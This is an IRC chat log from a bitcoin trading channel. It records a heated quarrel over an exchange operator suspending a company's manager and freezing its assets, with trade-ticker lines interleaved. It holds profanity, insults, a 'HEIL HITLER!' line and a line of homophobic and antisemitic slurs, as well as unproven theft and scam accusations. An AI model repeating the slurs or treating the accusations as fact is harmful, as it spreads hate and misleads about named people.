02:08:30 no one? Sep 12 02:08:34 really? Sep 12 02:08:37 and, surprise, people took advantage of that to align DMC bonds with their actual value Sep 12 02:08:40 Is there some kind of agreement I can read concerning this process? Sep 12 02:08:42 which is 0 BTC Sep 12 02:08:50 and always was Sep 12 02:08:54 Not agreement, documentation I mean. Sep 12 02:08:55 OneMiner: what process? Sep 12 02:08:58 even if you unlock the account right now, Im going to figure out some way to move DMC off GLBSE Sep 12 02:09:07 so all these shareholders claiming injury can fuck off imo Sep 12 02:09:17 I won't be unlocking the account until after the shareholder vote Sep 12 02:09:20 You know, like under what coinditions this kind of action can take place. Sep 12 02:09:31 nefario: stepping in to this train wreck is bad for GLBSE Sep 12 02:09:32 actually this is the first case Sep 12 02:09:38 nefario: if you can roll back I would Sep 12 02:09:41 dub: can't be helped Sep 12 02:09:48 fuck the shareholders Sep 12 02:09:51 GLBSE isn't just an exchange Sep 12 02:09:52 nefario: so you can't show people their shareholders because you'd need to change the TOS, but you can do this? Sep 12 02:10:07 OneMiner: so I dont know what to do Sep 12 02:10:28 copumpkin: TOS can be changed Sep 12 02:10:33 but I don't see why it should Sep 12 02:10:37 OneMiner: if I continue with the dedi/cloud stuff, people are going to attack customers saying nefario said dmc was a scam Sep 12 02:10:46 who has a right to know if someone owns their asset Sep 12 02:10:49 OneMiner: which harms shareholders, of which I cant pay Sep 12 02:10:50 [MPEX] [F.GIGA.ETF] 8399 @ 0.00043227 = 3.6306 BTC [+] Sep 12 02:10:50 [MPEX] [F.GIGA.ETF] 2319 @ 0.00043325 = 1.0047 BTC [+] Sep 12 02:10:56 nefario: I just mean that you're using the TOS as an excuse to not show shareholders in one case, but then unilaterally move in and make an executive decision regarding DMC Sep 12 02:11:16 Diablo-D3 has never asked me for a list of shareholders Sep 12 02:11:26 I saw him do so earlier in here Sep 12 02:11:26 Perhaps this can go another way? Is it possible that there's a middle ground here? Sep 12 02:11:26 and he's not got any record of it Sep 12 02:11:30 I HAVE REPEATEDLY ASKED YOU TO ADD THAT FUNCTIONALITY Sep 12 02:11:31 because he didn't ask Sep 12 02:11:35 Goddamned fucking liar. Sep 12 02:11:37 then show me a record Sep 12 02:11:40 email Sep 12 02:11:41 irc log Sep 12 02:11:43 OneMiner: damage is already done. Sep 12 02:11:44 anything Sep 12 02:11:45 nefario: he's asking you now. Why is that not enough? Sep 12 02:11:45 nefario cant fix that. Sep 12 02:12:01 even if he goes on the dmc thread and apologize and say he was wrong, thats it Sep 12 02:12:09 theres no fixing this Sep 12 02:12:20 copumpkin: Because he's not running DMC, at best until after shareholders agree to it, at worst never Sep 12 02:12:28 it's up to the shareholders when there is a vote Sep 12 02:12:34 can you show me where on the TOS it allows you to do this? Sep 12 02:12:50 well, so in the end was the previous voting fixed by fake shares nefario ? Sep 12 02:13:04 what? Sep 12 02:14:03 [MPEX] [S.MPOE] 8027 @ 0.00039675 = 3.1847 BTC [-] Sep 12 02:14:04 aha, #9 Sep 12 02:14:06 Diablo-D3 held a shareholder vote Sep 12 02:14:12 maybe a week or 2 ago Sep 12 02:14:18 People seem to think that GLBSE is only a market and that nothing should interfere in the market Sep 12 02:14:24 but thats not the case Sep 12 02:14:24 there were accusations of impropriety at the time, as in, Sep 12 02:14:28 I think it's just misleading, honestly Sep 12 02:14:32 treasury shares voted. Sep 12 02:14:40 copumpkin: whats missleading Sep 12 02:14:46 mircea_popescu: treasury shares cant vote Sep 12 02:14:58 only shareholders can Sep 12 02:15:03 you need to make it clear that people listing their securities on your exchange are accepting your pseudolegal oversight as well as your exchange services Sep 12 02:15:06 yes, but you can move them to an account and vote from there. Sep 12 02:15:06 [GLBSE] [M.ETF] 2 @ 0.1299 = 0.2598 BTC [+] Sep 12 02:15:16 mircea_popescu: not without nefario knowing Sep 12 02:15:20 it's usually assumed that my company is mine Sep 12 02:15:22 you know Sep 12 02:15:23 he can go on his fucking sql server and check right now Sep 12 02:15:28 not something you can take away because you decide Sep 12 02:15:29 I own 40 fucking shares. Sep 12 02:15:30 One more step to access glbse.com Sep 12 02:15:34 Why am I seeing this page? Sep 12 02:15:34 Your IP address based on the country, region or network has been flagged by the website owner. Sep 12 02:15:37 this is muy lol. Sep 12 02:15:38 that's something for the law to do, if anything Sep 12 02:15:39 [GLBSE] [M.ETF] 3 @ 0.13 = 0.39 BTC [+] Sep 12 02:15:45 I'm not saying glbse is wrong Sep 12 02:15:45 copumpkin: it's not your company if it belongs to your shareholders, then it's theirs Sep 12 02:15:53 there is also no precedent to this on GLBSE Sep 12 02:16:07 welll so then creating precedent on the cuff like this ? Sep 12 02:16:10 and not _one_ shareholder came to me and asked me to step down Sep 12 02:16:12 nefario: yes, that's possible, but the question is why _you_'re the one making the call Sep 12 02:16:16 [GLBSE] [BFLS.RIG] 3 @ 0.979 = 2.937 BTC [+] Sep 12 02:16:17 many _non_ shareholders did Sep 12 02:16:19 nefario: anyway, I'm just saying, make it more clear Sep 12 02:16:21 like EskimoBob and p4man Sep 12 02:16:29 copumpkin: have you not read the thread on the forum? Sep 12 02:16:35 but the two largest shareholders have been more than happy with my performance Sep 12 02:16:43 hm. Sep 12 02:16:45 and I've had DMC shareholders on my back for weeks now to do something Sep 12 02:16:47 not small ones Sep 12 02:16:49 I shouldn't have to read the thread on the forum if I'm trying to use your site to raise capital :) Sep 12 02:16:56 not only that, nefario has threatened the second largest shareholder as well Sep 12 02:16:58 I'm saying make it clear on the site what we're signing up for :P Sep 12 02:16:59 [MPEX] [S.MPOE] 27300 @ 0.00039652 = 10.825 BTC [-] Sep 12 02:17:06 Diablo-D3: who would that be? Sep 12 02:17:10 usagi. Sep 12 02:17:24 I've threatened him? Sep 12 02:17:28 yes. Sep 12 02:17:32 lol Sep 12 02:17:37 you're so full of shit Sep 12 02:17:50 wait. is usagi a shareholder by virtue of you GIVING him shares or by virtue of he BUYING them on the market ? Sep 12 02:18:12 mircea_popescu: giving? no Sep 12 02:18:12 when did he say I threatened him? Sep 12 02:18:19 Ive never given shares to anyone Sep 12 02:18:50 Have you not read what usagi wrote on the thread about you? Sep 12 02:18:57 He's not your supporter Sep 12 02:19:05 you have cost him a LOT of money Sep 12 02:19:11 no, hes trying to protect his company from YOU Sep 12 02:19:22 oh wow this is amazing Sep 12 02:19:24 this reminds me of the good old days of litigating corp financings gone bad. Sep 12 02:19:49 you've already threatened to steal DMC shares from nyan and cpa to prevent them from voting on your fake motion Sep 12 02:19:58 HA Sep 12 02:20:00 [MPEX] [S.MPOE] 17400 @ 0.00039479 = 6.8693 BTC [-] Sep 12 02:20:01 [MPEX] [S.MPOE] 15600 @ 0.00039466 = 6.1567 BTC [-] Sep 12 02:20:07 -kakobrekla- at least theres drama! Sep 12 02:20:20 usagi is a massive GLBSE supporter Sep 12 02:20:29 he was. Sep 12 02:20:33 still is Sep 12 02:20:37 if you say so. Sep 12 02:20:45 ask him yourself when he gets back Sep 12 02:20:49 [GLBSE] [GIGAMINING] 5 @ 0.6158 = 3.079 BTC [-] Sep 12 02:20:50 [GLBSE] [GIGAMINING] 10 @ 0.616 = 6.16 BTC [+] Sep 12 02:21:21 nope, Im not. he is scared shitless that you're going to do the same thing you tried to do to me Sep 12 02:21:35 OMFG Sep 12 02:21:39 how Sep 12 02:21:48 most or all of nyan and bmf and cpa's assets are on glbse Sep 12 02:21:55 well there is some disparity here. Sep 12 02:21:58 how do you construct such an elaborate alternate reality? Sep 12 02:22:01 you're just going to lock them up and claim the shareholders pressured you Sep 12 02:22:21 you think I'm like some evil overlord? Sep 12 02:22:26 I just run a website Sep 12 02:22:27 I didnt before today! Sep 12 02:22:39 [GLBSE] [OBSI.HRPT] 8 @ 0.1017 = 0.8136 BTC [+] Sep 12 02:22:58 http://fc07.deviantart.net/fs70/i/2011/129/d/8/dr__nefario_by_soap_2-d3fxp39.jpg Sep 12 02:23:04 [GLBSE] [GIGAMINING] 33 @ 0.6198 = 20.4534 BTC [+] Sep 12 02:23:08 apparently this is what I actually look like Sep 12 02:23:39 Nice art. I likes. Sep 12 02:23:45 And I've got winged monkies Sep 12 02:24:06 so thats how you dodge accusations? you post nonsense urls? Sep 12 02:24:15 what accusations? Sep 12 02:24:21 its a little late to run for the republican nomination this year, bro. Sep 12 02:24:21 of being a super villian? Sep 12 02:24:41 [MPEX] [F.GIGA.ETF] 10100 @ 0.00044248 = 4.469 BTC [+] Sep 12 02:24:41 hang on while I pop down to the bank of evil to take out another loan Sep 12 02:24:41 [MPEX] [F.GIGA.ETF] 13881 @ 0.00044307 = 6.1503 BTC [+] Sep 12 02:25:30 mircea_popescu: am I the only one here who was expecting a reasonable response? Sep 12 02:25:46 I'm single-handedly holding the entire bitcoin community at randsom, ALL LIVE IN FEAR BEFORE ME!!!! Sep 12 02:26:02 I eat babies Sep 12 02:26:02 lol Sep 12 02:26:06 What I don't get is how everybody knows who is competent or not? Maybe it was ham fisted or maybe it was a super slick move. Sep 12 02:26:07 <3 dis chan. Sep 12 02:26:12 well, the approach is problematic, but i don't see you could have continued in your position Sep 12 02:26:42 If I do nothing, I'm accused of letting shareholders wealth be destroyed Sep 12 02:26:51 mircea_popescu: who knows, pretty sure investors would have liked a few hundred btc extra dividends a month Sep 12 02:27:03 but nefario pretty much fucked that up for everyone. Sep 12 02:27:16 Diablo-D3: you can still pay dividends Sep 12 02:27:21 nope, not happening. Sep 12 02:27:23 it's up to you whether or not to Sep 12 02:27:26 To hear diablo explain it the assets he sold were loosing value quickly. He also alludes to future contracts. Sep 12 02:27:32 [GLBSE] [GSDPT] 7 @ 0.00339999 = 0.0238 BTC [+] Sep 12 02:27:50 Not that I know but it suggests to me that there was a plan at the least. Sep 12 02:27:51 nefario: I will never send another dime to glbse. Sep 12 02:28:01 the problem afaik was never assets sold, it was assets traded Sep 12 02:28:12 Diablo-D3 was using a non-market value based system to trade Sep 12 02:28:14 mircea_popescu: thats a different issue Sep 12 02:28:15 Diablo-D3: good thing it's priced in BTC Sep 12 02:28:27 I traded roughly 1 BTC of assets for 1 DMC Sep 12 02:28:36 the asset market went pear shaped Sep 12 02:28:40 mircea_popescu I remember that. Seemed like a way to generate hype. Sep 12 02:28:52 Momentum gaining move. Sep 12 02:29:00 [MPEX] [S.MPOE] 4100 @ 0.00039466 = 1.6181 BTC [-] Sep 12 02:29:01 [MPEX] [S.MPOE] 3400 @ 0.00039453 = 1.3414 BTC [-] Sep 12 02:29:10 but notice, nefario didnt do one thing to punish fixed mhash bond issuers Sep 12 02:29:13 OneMiner: DMC shareholders have for weeks been badgering me to do something about Diablo-D3, I've suspended him from control of DMC and will initiate an investigation and a vote Sep 12 02:29:33 DMC shareholders are going to be given a say in whether they want to keep him as operator of DMC Sep 12 02:29:48 DMC shareholders are going to sell their shares and get out why they can Sep 12 02:29:50 and I dont blame them Sep 12 02:30:05 DMC isn't frozen Sep 12 02:30:13 have you seen a lot of trades of it recently Sep 12 02:30:19 has there been an exodus? Sep 12 02:30:23 Diablo-D3 it went from 1 to 0.05. if they weathered that, why would they leave now ? Sep 12 02:30:37 mircea_popescu: because now there isnt even 1600 BTC of assets Sep 12 02:30:46 nefario right. May I ask what their complaints were? Could the vote have taken place without the suspension? Sep 12 02:30:55 Not really Sep 12 02:31:25 for complaints, see the thread Sep 12 02:31:30 [GLBSE] [GIGAMINING] 2 @ 0.6197 = 1.2394 BTC [-] Sep 12 02:31:32 mircea_popescu: the only thing we have left is dedi/cloud sales, and now nefario's bullshit is just going to cross infect that Sep 12 02:31:46 Ok. Is there a deadline for voting yet? Sep 12 02:31:55 it's not even been started Sep 12 02:31:59 I see. Sep 12 02:32:03 it's going to be mid next weel Sep 12 02:32:05 week Sep 12 02:32:14 There will be an investigation Sep 12 02:32:17 mircea_popescu: might as well not even continue with the plan. Sep 12 02:32:22 I'll get someone to go over the accounts Sep 12 02:32:28 see if we can get a profit and loss Sep 12 02:32:48 .05 ! Sep 12 02:32:53 that takes about 15 lines of perl, nefario Sep 12 02:32:54 dont lie. Sep 12 02:33:20 hum Sep 12 02:33:24 And to allow time for a proper discussion Sep 12 02:33:25 such a mess this entire thing. Sep 12 02:33:57 Will also get a balance sheet worked out Sep 12 02:34:08 Diablo-D3: the accounts need to be done by a third party Sep 12 02:34:13 external auditor Sep 12 02:34:18 no one trusts your data to begin with Sep 12 02:34:29 You did until a few hours ago Sep 12 02:35:11 until you attacked dmc and it's shareholders, yes Sep 12 02:36:36 [GLBSE] [NYAN.B] 1 @ 0.975 BTC [+] Sep 12 02:37:24 What makes me lol is that the name says Diablo MINING Company and now he's whining with DEDI/CLOUD.. :-D Sep 12 02:37:25 I've just answered shareholders calls Sep 12 02:37:34 and probably he never built a datacenter..... Sep 12 02:37:44 this is a large part of the problem Sep 12 02:37:49 bait n switch Sep 12 02:37:53 getting funding for one thing Sep 12 02:37:57 agath: read the plan Sep 12 02:38:01 then using it for something totally different Sep 12 02:38:04 and in the meantime Sep 12 02:38:16 agath: the data center stuff is fully featured in the plan Sep 12 02:38:19 pissing it away it terrible trade Sep 12 02:38:23 trades Sep 12 02:38:48 ... setting up a SMALL datacenter costs $450.000 or more (redundant power, cooling, firefighting, security/anti-theft, racks.....) Sep 12 02:39:00 agath: an even smaller one costs less. Sep 12 02:39:04 I don't see how he could set it up with 1600 BTC Sep 12 02:39:10 Solar power dude Sep 12 02:39:12 it's like Sep 12 02:39:14 the future Sep 12 02:39:17 execept Sep 12 02:39:18 no, we were raising a million dollars. Sep 12 02:39:22 when it's like Sep 12 02:39:25 not solar Sep 12 02:39:30 like dark and stuff Sep 12 02:39:33 night Sep 12 02:39:35 yeah Sep 12 02:39:39 I think nefario is on drugs. Sep 12 02:39:40 but thats like Sep 12 02:39:42 O Sep 12 02:39:44 K Sep 12 02:39:47 To be fair Diablo couldn't have made a DC with the funs he got from the IPO. He said he was going to make a DC and mine. He ended up mining. Seems truthful to me. Sep 12 02:39:56 s/funs/funds Sep 12 02:39:58 I don't see million dollars .. after first sales your shares always went DOWN... Sep 12 02:40:00 [MPEX] [S.MPOE] 13220 @ 0.00039453 = 5.2157 BTC [-] Sep 12 02:40:01 [MPEX] [S.MPOE] 29380 @ 0.00039443 = 11.5884 BTC [-] Sep 12 02:40:03 OneMiner: we didnt finish IPOing Sep 12 02:40:05 not even close Sep 12 02:40:08 I bought 10 of them and I am crying now. Sep 12 02:40:31 Ya, exactly. With the funds that you got the DC part of the plan was impossible. Sep 12 02:40:37 At this time. Sep 12 02:40:43 IMO... Sep 12 02:40:44 Diablo-D3: of course , you hadn't sold infinity number of shares for ever smaller amounts Sep 12 02:40:50 He didn't even got hardware for mining, he only traded other's bonds... Sep 12 02:41:20 so how could your IPO be considered over Sep 12 02:41:26 it's only been trading for months Sep 12 02:41:38 OneMiner: yeah, and now nefario is saying I bait and switched even though I was going into dedi/cloud stuff so I can raise money faster and work on stuff top down Sep 12 02:41:38 real IPOs take years I hear Sep 12 02:41:49 I'm wondering where are my 10 BTC I invested... :-| Sep 12 02:41:55 agath: nefario has it Sep 12 02:41:59 agath: dont ever expect to see it. Sep 12 02:42:11 Nefario doesn't own anything AFAIK.. Sep 12 02:42:13 depends on the value of the assets in DMC Sep 12 02:42:16 ja Sep 12 02:42:24 it belongs to DMC shareholders Sep 12 02:42:24 yeah, what you claim the value is Sep 12 02:42:31 I don't know the value Sep 12 02:42:32 "oh hey guys, I sold everything for 16 BTC." Sep 12 02:42:37 thats been your claim Sep 12 02:42:41 while you pocket the rest Sep 12 02:42:41 I bought 10 @ 1, you sold 45K+ and you don't have 45000 BTC, you have 1600... Sep 12 02:42:51 agath: 45k? hell no Sep 12 02:42:54 Diablo-D3: it can all be verified by an external auditor Sep 12 02:43:03 nefario: I dont care about your lies Sep 12 02:43:06 I really really dont. Sep 12 02:43:08 LIES!!! Sep 12 02:43:11 so even if nefario didn't freeze anything, you still don't have 1 BTC for every share sold. Sep 12 02:43:12 [GLBSE] [BIB.BVPS] 1 @ 0.0045 BTC [+] Sep 12 02:43:14 HEIL HITLER! Sep 12 02:43:22 agath: yes, because the market depreciated the assets. Sep 12 02:43:29 "the market". Sep 12 02:43:35 Diablo-D3: no you depreciated the assets Sep 12 02:43:38 agath: notice he did nothing to the people who did this, only the largest victim of it Sep 12 02:43:44 by issuing more and selling for less and less Sep 12 02:43:54 largest victim? Sep 12 02:43:58 you? Sep 12 02:44:01 nefario: oh yes, its completely legitimate to keep saying assets are worth 0.30 BTC when the highest ask is 0.10 Sep 12 02:44:02 ok I give up... do whatever you want, I feel I am wasting time discussing this . Sep 12 02:44:04 _totally_ legit Sep 12 02:44:10 you're the largest victim of...yourself? Sep 12 02:44:11 fucking moron Sep 12 02:44:13 or the market? Sep 12 02:44:14 It makes sense to me that when the funding that was required for plan A can't be raised you move on to plan B. I remember Diablo-D3 talking about buying bonds too. I'm sure he has been upfront about it. Sep 12 02:44:22 [GLBSE] [FPGAMINING] 2 @ 0.80789 = 1.6158 BTC [-] Sep 12 02:44:41 OneMiner: nope, we're not allowed to make sense here Sep 12 02:44:54 As Diablo-D3 has clearly demonstrated Sep 12 02:44:55 OneMiner: his company should have been a MINING COMPANY, not a FUND. Sep 12 02:45:23 Diablo-D3: what would you have me do? If you were in my position what would you do? Sep 12 02:45:29 if I wanted to invest on other GLBSE companies I would have bought 10 NYAN not 10 DMC. Sep 12 02:45:39 agath: nyan didnt exist yet, moron Sep 12 02:45:42 there were no funds yet. Sep 12 02:45:48 ok, then 10 MOVETO.FUND Sep 12 02:45:52 or 10 MU . Sep 12 02:45:56 there are PLENTY. Sep 12 02:46:03 sure, "plenty" Sep 12 02:46:05 there were som Sep 12 02:46:08 it was just an example, and I didn't insult you (YET). Sep 12 02:46:09 but i think some went bankrupt Sep 12 02:46:17 mircea_popescu: yeah, some went bankrupt Sep 12 02:46:24 and some were already being called scams Sep 12 02:46:36 agath I believe he stated in the past that he was holding bonds to try to gain some value untill ASICs dropped. Sep 12 02:46:38 but there were no funds that I could invest in yet Sep 12 02:46:41 I don't care if they went bankrupt: I didn't invest in a FUND because I didn't want to. Sep 12 02:46:41 Diablo-D3: what would you have done if you were in my position? Sep 12 02:46:47 OneMiner: yup, but no sense making, nefario wont have it Sep 12 02:46:59 OneMiner: when I bought DMC, ASICs weren't in the air yet Sep 12 02:47:03 nefario: oh, I'd do the same, but I would have stolen the btc not the assets Sep 12 02:47:07 nefario if he were in your position he'd have traded bonds for higher mh/s value Sep 12 02:47:08 Diablo-D3: in all honesty, while you should probably be making a show of dissaproval, this is the best possible outcome for you Sep 12 02:47:09 agath: not entirely true Sep 12 02:47:16 agath: bfl had not announced sc yet Sep 12 02:47:26 Diablo-D3: the only other way out of this fuckup you created was a scammer tag Sep 12 02:47:39 dub may well have it. Sep 12 02:47:43 dub: this is not the best possible outcome. Sep 12 02:47:55 well, he didn't say the best theoretically possible outcome Sep 12 02:47:58 Diablo-D3: rejoice in the redemption nefario has bestowed upon you Sep 12 02:47:59 [MPEX] [S.BVPS] 321 @ 0.00345961 = 1.1105 BTC [-] Sep 12 02:48:01 [MPEX] [S.BVPS] 179 @ 0.00340764 = 0.61 BTC [-] Sep 12 02:48:07 although if DMC dies, I can at least work on plan B without nefario being able to touch that Sep 12 02:48:16 so maybe theres a silver lining Sep 12 02:48:22 Diablo-D3: exactly Sep 12 02:48:25 anyway, it would have been far better to NOT DO ANYTHING and keep your funds for a better time, instead of swapping that much and lose all the value. Sep 12 02:48:36 agath they always were. It's a forgone conclusion. If bitcoin succeeds then there will be ASICs. The only way there won't be is if bitcoin flops, in that case we are all out our investments. Sep 12 02:48:39 Diablo-D3: and now people have a much better understanding of your capabitlities to asses their investment Sep 12 02:48:39 Diablo-D3: good luck with your plan B Sep 12 02:48:46 agath: thats 20:20 hindsight there, bro Sep 12 02:48:56 actually as a point of policy, it seems to me that if company ipos for plan A and it fails to raise the funds, it just pays everony back and dissolves. Sep 12 02:48:57 heh capabitlities Sep 12 02:49:08 how was I supposed to know fixed mhash bond issuers would sell fake bonds into the bid wall on th news bfl was doing asics Sep 12 02:49:21 this working on the observation that if i invite a girl over for a suck & fuck and instead a fat dood shows up for a stamp collection showdown i JUST KICK HIM OUT Sep 12 02:49:24 mircea_popescu: except I never quit with plan A Sep 12 02:49:36 UD: capabitlities; n, the abject inability of bitcoin service operators to avoid fucking up Sep 12 02:49:53 I made decisions to make sure plan A can happen with less money from investors. Sep 12 02:49:59 OneMiner: ok, but what's the point? I am sure that tomorrow there will be 45nm ASIC, the next semester 28nm ASICS, the next decade QUANTUM chips... so I never buy hardware because if bitcoin succeeds there will be QUANTUM chips. Or whatever else comes after. Sep 12 02:50:17 agath that's silly. Sep 12 02:50:23 agath: I notice you too ignored what I said. Sep 12 02:50:43 fixed mhash bond issuers sold bonds that had _no hardware to back them_ Sep 12 02:50:55 because they knew they could pocket hundreds of btc and buy asic later on Sep 12 02:50:59 [MPEX] [S.MPOE] 5420 @ 0.00039443 = 2.1378 BTC [-] Sep 12 02:51:01 [MPEX] [S.MPOE] 31235 @ 0.00039422 = 12.3135 BTC [-] Sep 12 02:51:02 [MPEX] [S.MPOE] 4000 @ 0.00039416 = 1.5766 BTC [-] Sep 12 02:51:03 [MPEX] [S.MPOE] 11537 @ 0.00039415 = 4.5473 BTC [-] Sep 12 02:51:10 difficulty was skyrocketing high enough that they could hide it for years and no one would know Sep 12 02:51:10 how is that relevant? Sep 12 02:51:20 dub: BECAUSE DMC WAS HOLDING THE FUCKING BONDS Sep 12 02:51:23 if they pay dividends it doesnt really matter if thye have hardware or not Sep 12 02:51:27 I understood that. But it's not the point. You wanted to do a mining company, then why didn't you buy hardware for doing it instead of bonds? If you bought by that time, FPGAs would already have paid for theirselves.. Sep 12 02:51:31 thank God I dumped as many as possible before we lost all the assets Sep 12 02:51:36 dub o no. that's ponzi. Sep 12 02:51:39 and you would have money to invest into ASICs at the end of the year. Sep 12 02:51:57 I could have done nothing and let _all_ the asset value evaporate Sep 12 02:52:10 instead I doubled our mhash and only lost about a third Sep 12 02:52:15 Damn, I'm going to bounce. I'd love to stay and talk.... Good luck to everybody. I hope this can be less of a train wreak than it sounds. Sep 12 02:52:50 mircea_popescu: sure but who is to know? Sep 12 02:53:06 OneMiner it will be more, trust me. Sep 12 02:53:10 only a few issuers have even posted pic of their shit Sep 12 02:53:14 nothing except btc is ever less than it sounds in btc land Sep 12 02:53:21 and that cannot be trusted Sep 12 02:53:47 [GLBSE] [OBSI.HRPT] 2 @ 0.10165 = 0.2033 BTC [-] Sep 12 02:54:16 [GLBSE] [DI.BFLSC.FAIL] 95 @ 0.001 = 0.095 BTC [+] Sep 12 02:54:23 hah Sep 12 02:54:25 someome bought fail Sep 12 02:54:34 I should warn in the thread Sep 12 02:54:37 DI will not pay out Sep 12 02:54:47 nefario froze assets and there is no payout. Sep 12 02:54:53 see your problem is that diff and btc/usd went up Sep 12 02:55:10 hm Diablo-D3? Sep 12 02:55:12 dub: that didnt improve things, no Sep 12 02:55:20 are we going to see another staff -> scam ? Sep 12 02:55:21 kakobrekla: nefario has stolen all assets that belong to dmc Sep 12 02:55:21 if you had actually executed your plan that would have been good for you Sep 12 02:55:30 diff is *still* going up Sep 12 02:55:30 kakobrekla: that includes di Sep 12 02:55:33 OneMiner: what does it mean "going to bounce"? English is not my language. Bounce on the bed? Bounce on your GF? Anything else? Sep 12 02:55:35 as in, built some fucking mining capacity Sep 12 02:55:41 agath: he went to bed Sep 12 02:55:49 got it, ty :) Sep 12 02:56:01 [GLBSE] [OBSI.HRPT] 11 @ 0.10165 = 1.1182 BTC [-] Sep 12 02:56:14 nefario 'stole' them/ Sep 12 02:56:15 ? Sep 12 02:56:20 rg: yup. Sep 12 02:56:27 they are no longer in dmc's possession Sep 12 02:56:55 rg: Diablo-D3 has been suspended as the admin of DMC for gross incompetence on continual request of DMC shareholders Sep 12 02:56:55 why Sep 12 02:56:59 [MPEX] [S.MPOE] 11100 @ 0.00039523 = 4.3871 BTC [+] Sep 12 02:57:06 oh Sep 12 02:57:08 rg: he wants the 1600 BTC in assets. Sep 12 02:57:24 so whos the admin in charge Sep 12 02:57:25 rg if you read the thread, nefario could stop answering the same questions over and over :) Sep 12 02:57:29 surely a neutral party? Sep 12 02:57:29 until after a shareholder vote on whether to keep DMC as admin (in about 1 weeks time) Sep 12 02:57:44 why that long Sep 12 02:57:45 nefario how about DI insurance Sep 12 02:57:58 jesus Sep 12 02:57:58 why Sep 12 02:57:58 oh <<< lmao Sep 12 02:57:59 remind me about DI insurance Sep 12 02:58:00 not that i have a bet in it, just curious Sep 12 02:58:08 umm Sep 12 02:58:12 diablo runs that? Sep 12 02:58:20 how is it affected Sep 12 02:58:20 rg: so, what I want to see, is how nefario is going to steal the dedi/cloud shit Sep 12 02:58:36 what i want to see Sep 12 02:58:41 is when diablo gets voed back to admin Sep 12 02:58:44 and is like oh Sep 12 02:58:45 yeah Sep 12 02:58:47 maybe he wasnt stealing it Sep 12 02:59:01 and the train continues plowing through a schoolbus full of children Sep 12 02:59:01 ahahahaha Sep 12 02:59:07 cause its hilarious Sep 12 02:59:09 DI insurance is frozen as well I guess Sep 12 02:59:11 you know, at this point is worth buying dmc just to vote him back in Sep 12 02:59:20 lol Sep 12 02:59:26 i'll sell you my share Sep 12 02:59:28 mircea_popescu: nefario will probably lock dmc sales then Sep 12 02:59:35 no Sep 12 02:59:40 open market until then Sep 12 02:59:40 Diablo-D3 two top investors were on your side anyway eright ? Sep 12 02:59:43 and after Sep 12 02:59:51 mircea_popescu: yup, but nefario has already said hes going to take their shares Sep 12 02:59:54 mircea_popescu: if you want to burn money for your own entertainment Sep 12 02:59:55 pretty sure usagi owned most of it Sep 12 02:59:57 because they're "illegitimate" Sep 12 03:00:00 [MPEX] [S.MPOE] 16443 @ 0.00039523 = 6.4988 BTC [+] Sep 12 03:00:01 [MPEX] [S.MPOE] 14051 @ 0.0003956 = 5.5586 BTC [+] Sep 12 03:00:05 nefario what else is money for. Sep 12 03:00:06 and usagi was the complainant? Sep 12 03:00:24 if nefario burned every single share that was traded for, there'd be about 50 fucking shares left. Sep 12 03:00:29 mmm, take their shares ? so how many shares will there be left ? Sep 12 03:00:29 usagi often bitched at Diablo-D3 in here Sep 12 03:00:33 so good luck with that. Sep 12 03:00:39 dub: yes, and I bitched at usagi Sep 12 03:01:06 iirc usage was new when it bought in to DMC Sep 12 03:01:27 not sure whether thats when you were in build fpga farm mode or run mining fund mode Sep 12 03:01:47 mircea_popescu: who knows Sep 12 03:01:58 theres about 15k shares out there that got traded in due to asicminer Sep 12 03:02:37 well Sep 12 03:02:40 lets be clear Sep 12 03:02:59 they were traded for asicminer because you revalued DMC at .05btc oslt Sep 12 03:03:02 mircea_popescu: if he attacks the two people who did the largest trading, then theres pretty much nobody left Sep 12 03:03:15 dub: nope, I revalued asicminer at 10btc or more Sep 12 03:03:24 smickles: does it mean anything to you if I say "divs on CFF under GAAP?" Sep 12 03:03:25 Diablo-D3: same thing Sep 12 03:03:28 [GLBSE] [PIMP] 40 @ 0.132 = 5.28 BTC [-] Sep 12 03:03:54 you know whats going to be hilarious? Sep 12 03:04:00 [MPEX] [F.GIGA.ETF] 9919 @ 0.00044081 = 4.3724 BTC [-] Sep 12 03:04:09 Diablo-D3: WTF are you talking about, attack the largest trading? Sep 12 03:04:15 er, traders Sep 12 03:04:23 still Sep 12 03:04:25 no, trading Sep 12 03:04:31 maybe trades would be better Sep 12 03:04:33 WTF are you talking about Sep 12 03:04:44 string a decent sentence together you chickenhead Sep 12 03:04:48 nefario: two people are about 15k shares together. Sep 12 03:04:48 nefario: you stole his windmills man Sep 12 03:05:02 so who the fuck are these shareholders you keep saying told you to do this Sep 12 03:05:06 two people? Sep 12 03:05:10 what two people? Sep 12 03:05:23 go fuck yourself, nefario Sep 12 03:05:29 Learn to speak Sep 12 03:05:31 make sense Sep 12 03:05:42 you already know usagi is one of them. Sep 12 03:05:46 instead of jabbering on about my scheme to be master of the universe Sep 12 03:05:47 you can find out who the other is. Sep 12 03:05:53 USAGI IS NOT ON YOUR SIDE Sep 12 03:06:00 usagi sure as hell isnt on yours! Sep 12 03:06:05 nefario: suggest to stfu at this point Sep 12 03:06:12 and usagi already knows Im pissed at him Sep 12 03:06:23 he needs to grow a set of fucking balls Sep 12 03:06:27 why should he care what you think? Sep 12 03:06:34 nefario: discussing names here is inappropriate Sep 12 03:06:35 <[\\\]> hello friends Sep 12 03:06:43 shuddup imsaguy Sep 12 03:06:45 hi2u imsaguy Sep 12 03:06:52 ;;seen pirateat40 Sep 12 03:06:52 I have not seen pirateat40. Sep 12 03:06:55 :-D Sep 12 03:06:56 ah it's you imsaguy Sep 12 03:07:00 everywhere you look, fags and jews Sep 12 03:07:02 <[\\\]> Diablo-D3, I hear your friend nefario gave you an awesome birthday present Sep 12 03:07:02 lol Sep 12 03:07:09 but ASICMINER is not VALUED 10, and probably will never be!!! Sep 12 03:07:11 <[\\\]> glwt copumpkin copumpkin :P Sep 12 03:07:20 [\\\]: in a nice box too Sep 12 03:07:21 inb4 ghost Sep 12 03:07:25 ribbon on top Sep 12 03:07:38 <[\\\]> lulz Sep 12 03:07:44 <[\\\]> @copumpkin Sep 12 03:07:59 [MPEX] [S.MPOE] 33583 @ 0.00039415 = 13.2367 BTC [-] Sep 12 03:08:00 [MPEX] [S.MPOE] 24317 @ 0.00039414 = 9.5843 BTC [-] Sep 12 03:08:01 <[\\\]> I ain't getting in the middle of the tizzy of nef/d3 Sep 12 03:08:12 I'm pretty much done Sep 12 03:08:14 [\\\]: nothing to get in the middle of Sep 12 03:08:15 I will! Group hug! Sep 12 03:08:18 had my fun after work Sep 12 03:08:19 nefario won Sep 12 03:08:21 <[\\\]> Diablo-D3: moving to the other? Sep 12 03:08:26 Diablo-D3: you need to go full crazy at this point start crapping in your 